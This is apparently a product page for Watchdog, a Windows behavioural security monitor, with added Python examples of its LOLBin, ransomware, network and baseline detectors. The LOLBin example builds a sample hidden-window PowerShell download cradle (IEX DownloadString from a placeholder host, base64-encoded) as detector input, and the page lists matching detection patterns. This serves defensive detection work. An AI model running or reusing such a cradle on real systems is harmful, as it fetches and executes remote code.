Watchdog is a single-binary behavioural security monitor for Windows. It subscribes to the kernel's own event streams, enriches every event with live process context, and scores them through thirteen heuristic detectors against a baseline it learns at runtime — no signature lists, no threat feeds, no cloud.
Watchdog subscribes to five Event Tracing for Windows providers in a single real-time session, the same plumbing Defender and EDR products consume (Process Monitor uses ETW for its network events; its file and registry traces come from its own filter driver). A sixth synthetic sensor polls for new drive letters. Everything it reports comes from the local system, observed through Windows' own instrumentation.
\Windows\ and \Program Files\. Writes feed the ransomware detectors; reads don't.
SetValueKey operations — writes to registry values.
QueryDosDevice every 2s. A new drive letter (USB, SD, mapped share) emits a RemovableDriveMounted event into the same pipeline.
Each event is resolved on the way through: process lookup from a live CreateToolhelp32Snapshot table, NT device paths canonicalised to C:\…, command lines fished out via NtQueryInformationProcess, Authenticode checked with WinVerifyTrust, and System-attributed connects re-mapped to their real owning process.
Each detector emits a sub-score in [0.0, 1.0]. The scorer combines them via 1 − Π(1 − sᵢ), the noisy-OR, so independent signals reinforce each other while the total never exceeds 1.0: a single 0.4 signal is Warn, two together reach 0.64, three reach 0.78 and cross into Crit. Severity buckets: Info ≥ 0.30 · Warn ≥ 0.40 · Crit ≥ 0.70.
A signed-but-abusable Windows binary (mshta, rundll32, certutil, powershell…) running with malware-pattern command lines: -EncodedCommand, iex(, DownloadString, base64 blobs.
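The LOLBin check and the scorer above, as an added example rather than Watchdog's own code. The regexes follow the patterns the page names; the weights, the decoding of the -EncodedCommand argument (base64 of UTF-16LE, rescanned so that iex( and DownloadString hidden inside the blob still count) and the sample command line are my assumptions.

```python
import base64
import re

# Signed-but-abusable binaries the page names (illustrative, not exhaustive).
LOLBINS = {"mshta.exe", "rundll32.exe", "certutil.exe", "powershell.exe", "pwsh.exe"}

# (name, pattern, weight): the patterns are the page's; the weights are assumed.
PATTERNS = [
    ("encoded-command flag", re.compile(r"(?<!\w)-(e|ec|enc|encodedcommand)\b", re.I), 0.50),
    ("iex(",                 re.compile(r"\biex\s*\(", re.I),                            0.40),
    ("DownloadString",       re.compile(r"\bDownloadString\b", re.I),                    0.40),
    ("base64 blob",          re.compile(r"[A-Za-z0-9+/]{40,}={0,2}"),                     0.30),
]
ENC_ARG = re.compile(r"(?<!\w)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def combine(scores):
    """Noisy-OR, 1 - prod(1 - s_i): independent signals reinforce, never exceed 1."""
    p = 1.0
    for s in scores:
        p *= 1.0 - max(0.0, min(1.0, s))
    return 1.0 - p


def severity(score):
    """Bucket a combined score with the page's thresholds; None means below Info."""
    if score >= 0.70:
        return "CRIT"
    if score >= 0.40:
        return "WARN"
    if score >= 0.30:
        return "INFO"
    return None


def decode_encoded_command(cmdline):
    """PowerShell's -EncodedCommand carries base64 of UTF-16LE; return the script or ''."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return ""
    blob = m.group(1)
    blob += "=" * (-len(blob) % 4)          # some droppers strip the padding
    try:
        return base64.b64decode(blob).decode("utf-16-le", errors="ignore")
    except ValueError:                      # binascii.Error is a ValueError
        return ""


def lolbin_score(image, cmdline):
    """Sub-score in [0, 1] plus the pattern names that fired.

    The decoded payload is scanned too: iex( and DownloadString usually hide
    inside the base64 rather than in the visible command line."""
    if image.lower() not in LOLBINS:
        return 0.0, []
    texts = [cmdline]
    decoded = decode_encoded_command(cmdline)
    if decoded:
        texts.append(decoded)
    hits = [(name, w) for name, rx, w in PATTERNS if any(rx.search(t) for t in texts)]
    return combine(w for _, w in hits), [name for name, _ in hits]


# Constructed sample: a hidden-window PowerShell download cradle, encoded.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"
SAMPLE_CMDLINE = "powershell.exe -nop -w hidden -enc " + base64.b64encode(
    PAYLOAD.encode("utf-16-le")).decode("ascii")


def score_event(image, cmdline, other_subscores=()):
    """One event through the LOLBin detector and the scorer: (sub, hits, total, bucket)."""
    sub, hits = lolbin_score(image, cmdline)
    total = combine([sub, *other_subscores])
    return sub, hits, total, severity(total)


if __name__ == "__main__":
    print(score_event("powershell.exe", SAMPLE_CMDLINE))
```

With the assumed weights the encoded cradle scores 0.874 on its own (four hits: the flag, the blob, and iex( plus DownloadString from the decoded text), which is already Crit before any other detector contributes; a plain `-ExecutionPolicy Bypass -File deploy.ps1` launch scores 0.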
Rarely-benign process chains: word/excel → cmd/powershell, chrome → shell, lsass → anything. Useful even without baseline — these chains are almost never legitimate.
Writes to 14 well-known autostart locations: Run, RunOnce, Image File Execution Options, Winlogon\Shell, AppInit_DLLs, service ImagePath, Active Setup…
A process touching ≥25 distinct directories in 10 s is the canonical ransomware / bulk-exfil fingerprint. Baseline-aware: legitimate I/O-heavy processes are suppressed once the baseline has learned their ceiling. Peaks at CRIT.
A process writing a burst of high-entropy files (Shannon ≥ 7.8 bits/byte, sampled from the first 4 KiB): encryption caught in the act. Already-compressed formats (zip, jpg, office, pdf…) are denylisted because they sit near 8 bits/byte on their own and would otherwise be false hits. Peaks at CRIT.
A binary running from a user-writable path (%TEMP%, %APPDATA%, Downloads, Desktop, an alternate data stream) with no valid Authenticode signature, verified through WinVerifyTrust. The highest-yield detector for downloaded malware.
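The two ransomware detectors (directory-traversal burst and high-entropy writes), as an added example that is not Watchdog's code. The thresholds are the page's (≥25 distinct directories in a 10 s window, Shannon ≥ 7.8 bits/byte over the first 4 KiB, compressed formats denylisted); the sub-score ramps, the per-image learned ceiling used for baseline suppression, the full denylist and the constructed file heads and paths are assumptions. `ntpath` is used so the NT paths split correctly whatever host runs the example.

```python
import math
import ntpath
from collections import Counter, defaultdict, deque

TRAVERSAL_DIRS, TRAVERSAL_WINDOW = 25, 10.0      # page: >=25 distinct dirs in 10 s
ENTROPY_MIN, SAMPLE_BYTES = 7.8, 4096            # page: Shannon >= 7.8 over first 4 KiB
# Already-compressed formats; the page names zip/jpg/office/pdf, the rest is assumed.
DENYLIST = {".zip", ".7z", ".gz", ".rar", ".jpg", ".jpeg", ".png", ".mp4",
            ".docx", ".xlsx", ".pptx", ".pdf"}


def shannon_bits_per_byte(data):
    """Shannon entropy of a byte string, 0.0 .. 8.0 bits per byte."""
    n = len(data)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def entropy_write_score(path, head):
    """Sub-score for one written file, judged from its first 4 KiB.

    Denylisted extensions return 0.0 outright: compressed formats sit near
    8 bits/byte on their own and would otherwise look like ciphertext."""
    if ntpath.splitext(path)[1].lower() in DENYLIST:
        return 0.0
    h = shannon_bits_per_byte(head[:SAMPLE_BYTES])
    if h < ENTROPY_MIN:
        return 0.0
    return 0.6 + 0.4 * (h - ENTROPY_MIN) / (8.0 - ENTROPY_MIN)   # assumed ramp to 1.0


class TraversalDetector:
    """Distinct directories written per process inside a sliding 10 s window."""

    def __init__(self, learned_ceiling=None):
        # image -> peak distinct-dir count learned while baselining (mature images only)
        self.learned = learned_ceiling or {}
        self.recent = defaultdict(deque)          # pid -> deque of (ts, directory)

    def observe(self, pid, image, ts, path):
        q = self.recent[pid]
        q.append((ts, ntpath.dirname(path)))
        while q and ts - q[0][0] > TRAVERSAL_WINDOW:
            q.popleft()                            # drop writes older than the window
        distinct = len({d for _, d in q})
        # Baseline suppression: a mature I/O-heavy image is judged against its
        # own learned ceiling instead of the global 25.
        threshold = max(TRAVERSAL_DIRS, self.learned.get(image, 0) + 1)
        if distinct < threshold:
            return 0.0
        return min(1.0, 0.7 + 0.3 * (distinct - threshold) / threshold)   # assumed ramp


def simulate_traversal(image, step_seconds, learned_ceiling=None, dirs=30):
    """Constructed burst: one process writes one file into each of `dirs`
    directories, `step_seconds` apart. Returns the peak sub-score seen."""
    det = TraversalDetector(learned_ceiling)
    return max(det.observe(4242, image, i * step_seconds,
                           rf"C:\Users\alice\Documents\proj{i}\notes.txt")
               for i in range(dirs))


# Constructed file heads: a uniform 4 KiB block (what ciphertext looks like to the
# entropy check) and a repetitive plaintext block.
CIPHERTEXT_HEAD = bytes(range(256)) * 16
PLAINTEXT_HEAD = b"The quick brown fox jumps over the lazy dog. " * 100

if __name__ == "__main__":
    print(simulate_traversal("evil.exe", 0.2))                          # 30 dirs in 6 s
    print(simulate_traversal("evil.exe", 2.0))                          # same dirs over 60 s
    print(simulate_traversal("backup.exe", 0.2, {"backup.exe": 40}))    # learned ceiling
    print(entropy_write_score(r"C:\Users\alice\Documents\q3.xlsx.locked", CIPHERTEXT_HEAD))
```

The same 30 directories spread over a minute never fill the window, and the backup tool with a learned ceiling of 40 stays silent at 30; the renamed `.xlsx.locked` file is scored from its bytes, while the same bytes under `.jpg` are skipped by the denylist.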
A program seen running many times before, but never connecting out, just made its first outbound TCP connection. Suggests a previously silent process is now phoning home. Peaks at WARN.
A mature, focused program connecting to an external /24 (v4) or /48 (v6) prefix it has never used. Complements NewNetworkEgress; chatty clients (>32 prefixes) and LAN/loopback are auto-excluded. Peaks at WARN.
Multi-evidence: ≥2 of {label entropy > 3.5 bits/char, abused TLD (.tk .xyz .top .icu…), label ≥ 40 chars}. Single hits alone are too noisy, since CDNs use random-looking subdomains too. Peaks at CRIT.
Temporal correlation: a removable drive letter just appeared, and within 5 minutes a process writes ≥10 distinct files to that drive. Two domains, one inference. Peaks at CRIT.
A critical system image (svchost, lsass, services, csrss…) launched from outside its expected directory, or an svchost not parented by services.exe. Classic process-masquerading move.
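The three network detectors above (NewNetworkEgress, the new-prefix check and the multi-evidence domain check), as an added example that is not Watchdog's code. The page supplies the thresholds: five samples to mature, a >32-prefix chatty cutoff, LAN/loopback excluded, /24 and /48 prefixes, and 2-of-3 on {entropy > 3.5 bits/char, abused TLD, label ≥ 40}. The profile shape, the sub-scores, the explicit local-range list (Python's `is_private` also covers the documentation ranges used as sample addresses here) and the constructed hostnames and connects are assumptions.

```python
import ipaddress
import math
from collections import Counter

MATURE_SAMPLES, CHATTY_PREFIXES = 5, 32      # page: 5 samples to mature, >32 prefixes = chatty
ABUSED_TLDS = {"tk", "xyz", "top", "icu"}    # the page's examples; a real list is longer
# LAN and loopback ranges that never count as egress (RFC 1918, loopback, link-local, ULA).
LOCAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16",
    "::1/128", "fe80::/10", "fc00::/7")]


class ImageProfile:
    """The slice of the per-image baseline the two connect detectors consult."""

    def __init__(self, samples=0):
        self.samples = samples               # launches observed so far
        self.ever_connected = False
        self.prefixes = set()                # /24 or /48 networks seen

    @property
    def mature(self):
        return self.samples >= MATURE_SAMPLES


def prefix_of(ip):
    """Collapse an address to its /24 (v4) or /48 (v6) network."""
    addr = ipaddress.ip_address(ip)
    bits = 24 if addr.version == 4 else 48
    return ipaddress.ip_network(f"{addr}/{bits}", strict=False)


def is_local(addr):
    return any(addr in net for net in LOCAL_NETS)


def connect_score(profile, remote_ip):
    """One outbound TCP connect: returns (detector name or None, sub-score)."""
    addr = ipaddress.ip_address(remote_ip)
    if is_local(addr):
        return None, 0.0
    net = prefix_of(addr)
    if not profile.mature:                        # still learning: record, never alert
        profile.ever_connected = True
        profile.prefixes.add(net)
        return None, 0.0
    if not profile.ever_connected:                # mature and silent until now
        profile.ever_connected = True
        profile.prefixes.add(net)
        return "NewNetworkEgress", 0.5            # assumed sub-score
    if len(profile.prefixes) > CHATTY_PREFIXES:   # browsers and the like talk everywhere
        profile.prefixes.add(net)
        return None, 0.0
    if net not in profile.prefixes:
        profile.prefixes.add(net)
        return "NewPrefix", 0.4                   # assumed sub-score
    return None, 0.0


def label_entropy(label):
    """Shannon entropy of one DNS label in bits per character."""
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in Counter(label).values()) if n else 0.0


def dga_score(hostname):
    """Fires only on >=2 of {entropy > 3.5, abused TLD, label >= 40 chars}."""
    labels = hostname.lower().rstrip(".").split(".")
    evidence = set()
    if labels[-1] in ABUSED_TLDS:
        evidence.add("abused-tld")
    for lab in labels[:-1]:
        if label_entropy(lab) > 3.5:
            evidence.add("high-entropy-label")
        if len(lab) >= 40:
            evidence.add("long-label")
    return (0.6 if len(evidence) >= 2 else 0.0), sorted(evidence)   # assumed sub-score


def simulate_connects():
    """Constructed sequence for a mature updater that has never connected (TEST-NET addresses)."""
    prof = ImageProfile(samples=6)
    return [connect_score(prof, ip) for ip in
            ("127.0.0.1", "203.0.113.10", "203.0.113.77", "198.51.100.5")]


if __name__ == "__main__":
    print(simulate_connects())
    print(dga_score("d3f1k9q2z8x5.cloudfront.net"))      # one hit only: stays quiet
    print(dga_score("abcdefghijklmnopqrstuvwxyz0123456789abcd.top"))
```

The loopback connect is ignored, the first real connect raises NewNetworkEgress, a second host in the same /24 is quiet, and a fresh /24 raises NewPrefix; the CDN-style hostname trips only the entropy test and therefore scores 0.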
An unsigned or untrusted module (DLL) loaded from a user-writable path — DLL sideloading / search-order hijacking. Verified with the same WinVerifyTrust cache; the process's own primary image is skipped.
An interactive process launched during an hour this host is normally idle, judged from a learned hour-of-day profile (≥5 days observed). On its own it is just an amplifier that nudges other signals up. Peaks at INFO.
Watchdog keeps a per-image profile that accumulates as it runs: observed parents, children, peak file-traversal counts, network destinations, whether the image ever connected out. After five samples an image is mature, and baseline-aware detectors trust the learned ceiling.
Persists to %ProgramData%\Watchdog\baseline.bin every 5 minutes, so the learning ramp happens once per machine. LOLBins are excluded by design — an attacker can't train the system to ignore powershell by repeating the same malicious act.
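The baseline described above (per-image profile, maturity at five samples, periodic persistence, LOLBins never learned), as an added example that is not Watchdog's code. The profile fields mirror the page's list; the on-disk format (JSON here, where Watchdog writes baseline.bin), the atomic-replace flush, the clock-driven 5-minute flush check, the LOLBin list and the sample events are assumptions.

```python
import json
import os
import tempfile
from dataclasses import asdict, dataclass, field

MATURE_SAMPLES, FLUSH_INTERVAL = 5, 300.0          # page: 5 samples, 5-minute persist
LOLBINS = {"powershell.exe", "mshta.exe", "rundll32.exe", "certutil.exe"}  # illustrative


@dataclass
class ImageProfile:
    samples: int = 0                                # launches observed
    parents: set = field(default_factory=set)
    children: set = field(default_factory=set)
    peak_dirs: int = 0                              # peak distinct-directory count seen
    ever_connected: bool = False

    @property
    def mature(self):
        return self.samples >= MATURE_SAMPLES


class Baseline:
    def __init__(self, path, now):
        self.path, self.last_flush = path, now
        self.images = {}

    def profile(self, image):
        return self.images.setdefault(image, ImageProfile())

    def observe_start(self, image, parent):
        if image in LOLBINS:        # never learn LOLBins: repetition must not earn trust
            return
        p = self.profile(image)
        p.samples += 1
        p.parents.add(parent)
        if parent not in LOLBINS:
            self.profile(parent).children.add(image)

    def observe_traversal(self, image, distinct_dirs):
        if image in LOLBINS:
            return
        p = self.profile(image)
        p.peak_dirs = max(p.peak_dirs, distinct_dirs)

    def observe_connect(self, image):
        if image not in LOLBINS:
            self.profile(image).ever_connected = True

    def ceiling(self, image):
        """Learned traversal ceiling a baseline-aware detector may trust, else None."""
        p = self.images.get(image)
        return p.peak_dirs if p and p.mature else None

    def maybe_flush(self, now):
        """Persist once per FLUSH_INTERVAL; returns True when a write happened."""
        if now - self.last_flush < FLUSH_INTERVAL:
            return False
        self.flush()
        self.last_flush = now
        return True

    def flush(self):
        data = {k: {**asdict(v), "parents": sorted(v.parents), "children": sorted(v.children)}
                for k, v in self.images.items()}
        tmp = self.path + ".tmp"
        with open(tmp, "w") as f:
            json.dump(data, f)
        os.replace(tmp, self.path)   # atomic swap: a crash mid-write keeps the old file

    @classmethod
    def load(cls, path, now):
        b = cls(path, now)
        if os.path.exists(path):
            with open(path) as f:
                for k, v in json.load(f).items():
                    v["parents"], v["children"] = set(v["parents"]), set(v["children"])
                    b.images[k] = ImageProfile(**v)
        return b


def demo():
    """Constructed run: a backup tool matures and gets a ceiling; powershell never does."""
    path = os.path.join(tempfile.mkdtemp(), "baseline.json")
    b = Baseline(path, now=0.0)
    for i in range(6):
        b.observe_start("backup.exe", "services.exe")
        b.observe_traversal("backup.exe", 40 + i)
        b.observe_start("powershell.exe", "explorer.exe")   # repeated, never learned
    b.observe_traversal("powershell.exe", 500)
    early = b.maybe_flush(120.0)          # two minutes in: nothing written yet
    flushed = b.maybe_flush(301.0)
    b2 = Baseline.load(path, now=301.0)   # a fresh process picks the ramp up where it left off
    return {"ceiling": b2.ceiling("backup.exe"), "lolbin": b2.ceiling("powershell.exe"),
            "early": early, "flushed": flushed, "mature": b2.profile("backup.exe").mature,
            "learned_images": sorted(b2.images)}
```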
The TUI defaults to a consumer-facing summary. Three deeper pages are one keystroke away from anywhere — raw, network, offensive.
Six panels in two columns, built so a non-analyst can answer "is something bad happening?" in five seconds.
Time-ordered stream of every scored event. The 50,000-event buffer evicts by a score-biased rule, so a flood of low-score events from a Defender scan can't wipe a WARN powershell from twenty minutes ago.
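The score-biased eviction the raw view relies on, as an added example that is not Watchdog's code. The page states the buffer size and the property (a scan flood must not push out an older WARN); the concrete rule here, evict the oldest event from the lowest populated severity bucket, and the constructed events are assumptions.

```python
import heapq
from itertools import count


def bucket(score):
    """Severity bucket index: 3 Crit, 2 Warn, 1 Info, 0 below Info (page thresholds)."""
    return 3 if score >= 0.70 else 2 if score >= 0.40 else 1 if score >= 0.30 else 0


class EventBuffer:
    """Bounded buffer that evicts the oldest event from the lowest populated bucket,
    so low-score noise recycles among itself while rarer WARN/CRIT events persist."""

    def __init__(self, capacity=50_000):
        self.capacity = capacity
        self.events = {}                   # seq -> event; dicts keep insertion (time) order
        self.heap = []                     # (bucket, seq): cheapest victim on top
        self.seq = count()

    def push(self, event):
        seq = next(self.seq)
        self.events[seq] = event
        heapq.heappush(self.heap, (bucket(event["score"]), seq))
        if len(self.events) > self.capacity:
            _, victim = heapq.heappop(self.heap)   # heap and dict stay in sync
            del self.events[victim]

    def timeline(self):
        return list(self.events.values())


def simulate_scan_flood(capacity=100, flood=200):
    """Constructed: one WARN powershell, then a flood of sub-Info scanner file reads."""
    buf = EventBuffer(capacity)
    buf.push({"score": 0.55, "summary": "powershell.exe -enc ... (LOLBin)"})
    for i in range(flood):
        buf.push({"score": 0.05, "summary": f"MsMpEng.exe read file {i}"})
    return buf.timeline()
```

A plain FIFO of the same size would have dropped the WARN after the hundredth scan event; here it stays at the head of the timeline and the flood evicts its own oldest members.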
Read-only inventory of everything on the wire: interfaces, neighbors, live TCP table, and a per-host inspector.
Currently one read-only tool: a WiFi scan from the WLAN API's cached results. No active attack code — strictly educational.
A monitor that overstates its coverage is worse than useless. Here is exactly where Watchdog is blind.
No installer, no driver, no kernel component. Download the single watchdog.exe, open an elevated terminal, and run it — or install it via Scoop. An optional background service mode is built in for always-on, headless use.
requireAdministrator manifest, so Windows raises the UAC prompt on launch automatically.
install-service